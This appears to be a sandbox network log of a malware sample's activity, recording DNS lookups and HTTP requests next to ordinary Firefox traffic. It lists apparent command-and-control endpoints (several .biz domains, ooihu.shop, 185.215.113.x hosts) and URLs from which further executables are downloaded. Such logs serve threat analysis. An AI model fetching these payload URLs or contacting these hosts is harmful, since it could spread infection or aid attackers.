GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com HTTP/1.1
Host: r4---sn-aigzrnsz.gvt1.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Cache-Control: public,max-age=86400
Content-Disposition: attachment
Content-Length: 14485862
Content-Security-Policy: default-src 'none'
Content-Type: application/zip
Etag: "1d3918c"
Server: downloads
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 0
Date: Tue, 10 Dec 2024 09:04:14 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
Vary: Origin
DNS

r4.sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4.sn-aigzrnsz.gvt1.com

IN A

Response

r4.sn-aigzrnsz.gvt1.com

IN A

74.125.175.169
DNS

r4.sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4.sn-aigzrnsz.gvt1.com

IN AAAA

Response

r4.sn-aigzrnsz.gvt1.com

IN AAAA

2a00:1450:4009:1b::9
DNS

206.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.187.250.142.in-addr.arpa

IN PTR

Response

206.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f141e100net
DNS

169.175.125.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

169.175.125.74.in-addr.arpa

IN PTR

Response

169.175.125.74.in-addr.arpa

IN PTR

lhr48s34-in-f91e100net

104.21.96.1:443

https://atten-supporse.biz/api

tls, http

2g5323.exe

1.1kB
4.7kB
11
8

HTTP Request

POST https://atten-supporse.biz/api

HTTP Response

200
172.67.206.64:443

https://covery-mover.biz/api

tls, http

2g5323.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://covery-mover.biz/api

HTTP Response

200
185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

2.9kB
3.6kB
22
15

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

2g5323.exe

1.8kB
43.2kB
27
37

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
31.41.244.11:80

http://31.41.244.11/files/unique2/random.exe

http

skotes.exe

553.0kB
16.7MB
11828
16465

HTTP Request

GET http://31.41.244.11/files/6904700471/Z9Pp9pM.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/1521297942/H3tyh96.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/8049824649/yiklfON.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/523681048/3EUEYgl.exe

HTTP Response

200

HTTP Request

GET http://31.41.244.11/files/unique2/random.exe

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/c4becf79229cb002.php

http

3d69R.exe

819 B
625 B
7
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200
205.209.109.10:4449

tls

H3tyh96.exe

6.4kB
4.2kB
48
44
172.67.213.48:443

https://fightlsoser.click/api

tls, http

Z9Pp9pM.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://fightlsoser.click/api

HTTP Response

200
172.67.206.64:443

https://covery-mover.biz/api

tls, http

Z9Pp9pM.exe

1.1kB
4.9kB
10
11

HTTP Request

POST https://covery-mover.biz/api

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

Z9Pp9pM.exe

1.6kB
43.2kB
22
37

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
149.154.167.99:443

https://t.me/detct0r

tls, http

3EUEYgl.exe

1.5kB
19.5kB
24
21

HTTP Request

GET https://t.me/detct0r

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

1.0kB
3.0kB
11
8

HTTP Request

GET https://ooihu.shop/

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

1.4kB
565 B
9
6

HTTP Request

POST https://ooihu.shop/

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

1.5kB
598 B
9
7

HTTP Request

POST https://ooihu.shop/

HTTP Response

200
88.221.135.115:80

http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D

http

3EUEYgl.exe

525 B
915 B
6
4

HTTP Request

GET http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgP4k%2Bk5CwN3hyog%2B%2FDYppS8vw%3D%3D

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

2.6kB
634 B
11
7

HTTP Request

POST https://ooihu.shop/

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

1.5kB
598 B
10
7

HTTP Request

POST https://ooihu.shop/

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

1.5kB
558 B
9
6

HTTP Request

POST https://ooihu.shop/

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

1.8kB
518 B
9
5

HTTP Request

POST https://ooihu.shop/

HTTP Response

200
116.203.10.31:443

https://ooihu.shop/

tls, http

3EUEYgl.exe

1.4kB
518 B
8
5

HTTP Request

POST https://ooihu.shop/

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/off/random.exe

http

skotes.exe

239.2kB
7.5MB
4628
5383

HTTP Request

GET http://185.215.113.16/luma/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/steam/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/well/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/off/random.exe

HTTP Response

200
80.82.65.70:80

http://80.82.65.70/soft/download

http

f47698ce5b.exe

40.0kB
1.5MB
701
1109

HTTP Request

GET http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp

HTTP Response

200

HTTP Request

GET http://80.82.65.70/dll/key

HTTP Response

200

HTTP Request

GET http://80.82.65.70/dll/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/files/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/soft/download

HTTP Response

200

HTTP Request

GET http://80.82.65.70/soft/download

HTTP Response

200
104.21.96.1:443

https://atten-supporse.biz/api

tls, http

f3745b045c.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://atten-supporse.biz/api

HTTP Response

200
172.67.206.64:443

https://covery-mover.biz/api

tls, http

f3745b045c.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://covery-mover.biz/api

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

f3745b045c.exe

2.2kB
44.3kB
31
37

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/c4becf79229cb002.php

http

0858ba6bc7.exe

819 B
625 B
7
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200
34.149.97.1:443

https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30

tls, http2

firefox.exe

2.9kB
12.8kB
22
22

HTTP Request

GET https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
216.58.213.14:443

youtube.com

firefox.exe

52 B
1
216.58.213.14:443

youtube.com

firefox.exe

52 B
1
216.58.213.14:443

https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

tls, http2

firefox.exe

3.0kB
10.0kB
19
20

HTTP Request

GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

HTTP Request

GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
172.217.16.238:443

www.youtube.com

tls

firefox.exe

1.1kB
6.9kB
10
8
142.250.200.46:443

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

tls, http2

firefox.exe

2.7kB
65.0kB
25
56

HTTP Request

GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
34.117.121.53:443

https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl

tls, http2

firefox.exe

1.8kB
21.3kB
21
28

HTTP Request

GET https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
142.250.187.196:443

https://www.google.com/favicon.ico

tls, http2

firefox.exe

2.0kB
7.4kB
15
15

HTTP Request

GET https://www.google.com/favicon.ico
127.0.0.1:63593

firefox.exe
127.0.0.1:63601

firefox.exe
142.250.187.196:443

www.google.com

firefox.exe

52 B
1
88.221.134.155:80

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

http

firefox.exe

18.8kB
506.3kB
303
366

HTTP Request

GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

HTTP Response

200
142.250.187.206:443

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

tls, http2

firefox.exe

1.8kB
8.9kB
21
20

HTTP Request

GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
74.125.175.169:443

https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

tls, http

firefox.exe

209.0kB
5.9MB
3311
4265

HTTP Request

GET https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

90.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

90.210.23.2.in-addr.arpa
8.8.8.8:53

atten-supporse.biz

dns

f3745b045c.exe

64 B
176 B
1
1

DNS Request

atten-supporse.biz

DNS Response

104.21.96.1

104.21.16.1

104.21.64.1

104.21.112.1

104.21.48.1

104.21.80.1

104.21.32.1
8.8.8.8:53

138.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

138.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

1.96.21.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

1.96.21.104.in-addr.arpa
8.8.8.8:53

se-blurry.biz

dns

f3745b045c.exe

59 B
121 B
1
1

DNS Request

se-blurry.biz
8.8.8.8:53

zinc-sneark.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

zinc-sneark.biz
8.8.8.8:53

dwell-exclaim.biz

dns

f3745b045c.exe

63 B
125 B
1
1

DNS Request

dwell-exclaim.biz
8.8.8.8:53

formy-spill.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

formy-spill.biz
8.8.8.8:53

covery-mover.biz

dns

f3745b045c.exe

62 B
94 B
1
1

DNS Request

covery-mover.biz

DNS Response

172.67.206.64

104.21.58.186
8.8.8.8:53

dare-curbys.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

dare-curbys.biz
8.8.8.8:53

print-vexer.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

print-vexer.biz
8.8.8.8:53

impend-differ.biz

dns

f3745b045c.exe

63 B
125 B
1
1

DNS Request

impend-differ.biz
8.8.8.8:53

steamcommunity.com

dns

f3745b045c.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.214.143.155
8.8.8.8:53

64.206.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

64.206.67.172.in-addr.arpa
8.8.8.8:53

43.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

43.113.215.185.in-addr.arpa
224.0.0.251:5353

690 B
10
8.8.8.8:53

155.143.214.23.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

155.143.214.23.in-addr.arpa
8.8.8.8:53

11.244.41.31.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

11.244.41.31.in-addr.arpa
8.8.8.8:53

206.113.215.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

206.113.215.185.in-addr.arpa
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

10.109.209.205.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

10.109.209.205.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

134.130.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

134.130.81.91.in-addr.arpa
8.8.8.8:53

89.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

89.210.23.2.in-addr.arpa
8.8.8.8:53

fightlsoser.click

dns

Z9Pp9pM.exe

63 B
95 B
1
1

DNS Request

fightlsoser.click

DNS Response

172.67.213.48

104.21.35.43
8.8.8.8:53

se-blurry.biz

dns

f3745b045c.exe

118 B
121 B
2
1

DNS Request

se-blurry.biz

DNS Request

se-blurry.biz
8.8.8.8:53

48.213.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

48.213.67.172.in-addr.arpa
8.8.8.8:53

zinc-sneark.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

zinc-sneark.biz
8.8.8.8:53

dwell-exclaim.biz

dns

f3745b045c.exe

63 B
125 B
1
1

DNS Request

dwell-exclaim.biz
8.8.8.8:53

formy-spill.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

formy-spill.biz
8.8.8.8:53

dare-curbys.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

dare-curbys.biz
8.8.8.8:53

print-vexer.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

print-vexer.biz
8.8.8.8:53

impend-differ.biz

dns

f3745b045c.exe

63 B
125 B
1
1

DNS Request

impend-differ.biz
8.8.8.8:53

steamcommunity.com

dns

f3745b045c.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.214.143.155
8.8.8.8:53

78.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

78.210.23.2.in-addr.arpa
8.8.8.8:53

t.me

dns

3EUEYgl.exe

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

ooihu.shop

dns

3EUEYgl.exe

112 B
144 B
2
2

DNS Request

ooihu.shop

DNS Response

116.203.10.31

DNS Request

ooihu.shop

DNS Response

116.203.10.31
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

70.209.201.84.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

70.209.201.84.in-addr.arpa
8.8.8.8:53

31.10.203.116.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

31.10.203.116.in-addr.arpa
8.8.8.8:53

e6.o.lencr.org

dns

3EUEYgl.exe

120 B
446 B
2
2

DNS Request

e6.o.lencr.org

DNS Request

e6.o.lencr.org

DNS Response

88.221.135.115

88.221.135.106

88.221.134.115

88.221.135.113

88.221.135.97

88.221.135.114

DNS Response

88.221.135.115

88.221.135.97

88.221.135.106

88.221.135.114

88.221.134.115

88.221.135.113
8.8.8.8:53

21.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

21.236.111.52.in-addr.arpa
8.8.8.8:53

61.45.26.184.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

61.45.26.184.in-addr.arpa
8.8.8.8:53

115.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

115.135.221.88.in-addr.arpa
8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

16.113.215.185.in-addr.arpa
8.8.8.8:53

70.65.82.80.in-addr.arpa

dns

140 B
214 B
2
2

DNS Request

70.65.82.80.in-addr.arpa

DNS Request

70.65.82.80.in-addr.arpa
8.8.8.8:53

se-blurry.biz

dns

f3745b045c.exe

118 B
242 B
2
2

DNS Request

se-blurry.biz

DNS Request

se-blurry.biz
8.8.8.8:53

zinc-sneark.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

zinc-sneark.biz
8.8.8.8:53

dwell-exclaim.biz

dns

f3745b045c.exe

126 B
250 B
2
2

DNS Request

dwell-exclaim.biz

DNS Request

dwell-exclaim.biz
8.8.8.8:53

formy-spill.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

formy-spill.biz
8.8.8.8:53

dare-curbys.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

dare-curbys.biz
8.8.8.8:53

print-vexer.biz

dns

f3745b045c.exe

61 B
123 B
1
1

DNS Request

print-vexer.biz
8.8.8.8:53

impend-differ.biz

dns

f3745b045c.exe

63 B
125 B
1
1

DNS Request

impend-differ.biz
8.8.8.8:53

steamcommunity.com

dns

f3745b045c.exe

128 B
160 B
2
2

DNS Request

steamcommunity.com

DNS Request

steamcommunity.com

DNS Response

23.214.143.155

DNS Response

23.214.143.155
8.8.8.8:53

youtube.com

dns

firefox.exe

114 B
146 B
2
2

DNS Request

youtube.com

DNS Response

216.58.213.14

DNS Request

youtube.com

DNS Response

216.58.213.14
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

65 B
131 B
1
1

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

firefox-api-proxy.cdn.mozilla.net

dns

firefox.exe

79 B
160 B
1
1

DNS Request

firefox-api-proxy.cdn.mozilla.net

DNS Response

34.149.97.1
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

188 B
110 B
2
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

200 B
116 B
2
1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.149.97.1
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

136 B
232 B
2
2

DNS Request

shavar.prod.mozaws.net

DNS Response

44.228.225.150

35.85.93.176

54.213.181.160

DNS Request

shavar.prod.mozaws.net

DNS Response

54.213.181.160

35.85.93.176

44.228.225.150
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

206 B
238 B
2
2

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

164 B
196 B
2
2

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.213.14
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

100 B
128 B
1
1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

188 B
374 B
2
2

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
85 B
1
1

DNS Request

youtube.com

DNS Response

2a00:1450:4009:816::200e
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

14.213.58.216.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

14.213.58.216.in-addr.arpa
34.149.97.1:443

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

https

firefox.exe

1.8kB
4.3kB
6
6
216.58.213.14:443

youtube.com

https

firefox.exe

1.9kB
9.3kB
8
10
8.8.8.8:53

www.youtube.com

dns

firefox.exe

122 B
670 B
2
2

DNS Request

www.youtube.com

DNS Request

www.youtube.com

DNS Response

172.217.16.238

216.58.204.78

142.250.200.46

172.217.169.46

142.250.179.238

142.250.200.14

216.58.212.206

142.250.187.206

142.250.180.14

216.58.201.110

142.250.178.14

216.58.213.14

216.58.212.238

142.250.187.238

172.217.169.14

DNS Response

172.217.169.14

142.250.178.14

142.250.187.206

216.58.204.78

216.58.213.14

216.58.212.238

142.250.180.14

142.250.200.14

172.217.169.46

142.250.179.238

172.217.16.238

216.58.201.110

142.250.187.238

142.250.200.46

216.58.212.206
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
309 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

142.250.187.206

142.250.187.238

216.58.204.78

172.217.169.46

142.250.200.46

142.250.180.14

172.217.169.14

142.250.178.14

142.250.200.14

172.217.16.238

216.58.201.110

142.250.179.238

216.58.212.206

216.58.212.238

216.58.213.14
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
181 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:826::200e

2a00:1450:4009:822::200e

2a00:1450:4009:823::200e

2a00:1450:4009:827::200e
172.217.16.238:443

youtube-ui.l.google.com

https

firefox.exe

4.1kB
10.4kB
10
15
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.46
8.8.8.8:53

firefox-settings-attachments.cdn.mozilla.net

dns

firefox.exe

90 B
177 B
1
1

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

consent.youtube.com

DNS Response

2a00:1450:4009:823::200e
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

106 B
122 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

212 B
199 B
2
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net
142.250.200.46:443

consent.youtube.com

https

firefox.exe

2.2kB
9.4kB
10
11
8.8.8.8:53

160.181.213.54.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

160.181.213.54.in-addr.arpa
8.8.8.8:53

238.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

238.16.217.172.in-addr.arpa
8.8.8.8:53

150.225.228.44.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

150.225.228.44.in-addr.arpa
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

120 B
152 B
2
2

DNS Request

www.google.com

DNS Request

www.google.com

DNS Response

142.250.187.196

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81f::2004
8.8.8.8:53

74.204.58.216.in-addr.arpa

dns

72 B
171 B
1
1

DNS Request

74.204.58.216.in-addr.arpa
8.8.8.8:53

195.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.187.250.142.in-addr.arpa
8.8.8.8:53

196.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.187.250.142.in-addr.arpa
142.250.187.196:443

www.google.com

https

firefox.exe

2.1kB
10.7kB
9
11
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

164 B
196 B
2
2

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net
8.8.8.8:53

201.181.244.35.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

201.181.244.35.in-addr.arpa
8.8.8.8:53

ciscobinary.openh264.org

dns

firefox.exe

140 B
572 B
2
2

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.155

88.221.134.209

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.209

88.221.134.155
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

134 B
99 B
2
1

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.209

